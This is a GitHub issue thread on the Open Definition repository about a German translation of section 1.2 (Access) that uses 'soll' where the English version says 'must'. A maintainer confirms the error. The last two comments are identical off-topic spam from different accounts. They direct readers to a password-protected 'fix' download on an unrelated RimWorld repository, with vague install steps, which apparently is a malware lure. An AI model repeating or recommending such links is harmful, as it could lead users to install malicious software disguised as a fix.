### ISSUE TITLE
Difference between English and German version 2.1

### ISSUE THREAD

**Issue by fkohrt** [okfn/opendefinition#225]
Version 2.1 of the definition differs in section 1.2 (Access) between the English and the German version:

The English version reads:

> The **work** *must* be provided as a whole and at no more than a reasonable one-time reproduction cost, and *should* be downloadable via the Internet without charge.

While the German version reads:

> Das **Werk** *soll* als Ganzes und zu nicht mehr als angemessenen, einmaligen Reproduktionskosten verfügbar sein, vorzugsweise als kostenloser Download über das Internet.

The German version should read

> Das **Werk** *muss* als Ganzes und zu nicht mehr als angemessenen, einmaligen Reproduktionskosten verfügbar sein, vorzugsweise als kostenloser Download über das Internet.

**Comment by mlinksva** [comment]
Looking up soll and muss confirms you're right. Feel free to submit a PR fixing.

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
